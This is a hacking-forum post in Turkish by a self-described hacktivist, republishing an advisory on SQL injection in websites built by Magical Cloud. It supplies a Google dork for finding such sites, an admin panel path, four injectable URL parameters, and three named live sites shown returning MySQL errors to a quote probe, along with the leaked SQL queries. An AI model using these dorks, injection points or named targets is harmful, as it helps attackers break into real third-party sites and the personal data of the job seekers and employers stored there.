Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Powered By Magical Cloud SQL Injection Vulnerability
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 90 / 100
Rep Sayısı: 2766
Mesaj Sayısı: 6322
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Powered By Magical Cloud SQL Injection Vulnerability
01.10.2018 09:24
################################################################################​#################

# Exploit Title : Powered By Magical Cloud SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/10/2018
# Vendor Homepage : magicalcloud.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Description of the Product for the Magical Cloud :

They Say ; Magical Cloud Solutions Pvt. Ltd. is a fast growing, end-to-end information technology services and solutions provider
which delivers highly responsive and innovative solutions that help clients to align their IT strategy with their business
goals and address the most important IT needs today through a combination of consulting solutions, proprietary
services and Assets based Engagement Model.

We have full portfolio of services that include IT Consulting, Application Development and Management,
Independent Testing, Outsourced Product Development, Enterprise Software Solutions,
Business Intelligence & Data Warehousing as well as Resource Augmentation.

Magical Cloud has over 13 years of experience, combined, in web design and identity development.
Our clients are important to us and we make every effort to help you with your new or existing project.

################################################################################​#################

# Google Dork :

intext:''Powered By Magical Cloud''

# Admin Control Panel Path :

/error_index.php

# SQL Injection Exploits :

/service_detail.php?id=[SQL Injection]

/detail_job.php?Id=[SQL Injection]

/page.php?id=[SQL Injection]

/featuredemp.php?id=[SQL Injection]

################################################################################​#################

# Example Vulnerable Sites =>

myfuturejob.in/service_detail.php?id=7%27 => [ Proof of Concept ] => archive.fo/ighpV

hirehostess.com/detail_job.php?Id=366%27

myfuturejob.ph/detail_job.php?Id=366%27

# SQL Database Error =>

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near ''7''' at line 1"

The error was thrown from in the function and the offending sql statement is below:

select * from tbl_service where service_id='7''

select *,f.fld_name as functionalArea, i.fld_name as industry, tbl_country.name,tbl_state.fld_name,p.fld_city as
jobcity,p.fld_desired_pro as dpro ,p.fld_companyWebsite as compurl,p.fld_aboutCompany as abtcomp from
tbl_postjob p join tbl_employer e on p.fld_post_emplrId=e.fld_uEmployerId join tbl_functional_area f on
p.fld_functionalArea=f.fld_id join tbl_industries i on p.fld_industry=i.fld_id left join tbl_country
on p.fld_country=tbl_country.id left join tbl_state on p.fld_state=tbl_state.fld_id where fld_jobId=314'
and p.fld_status='1' and p.fld_expire='0'

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi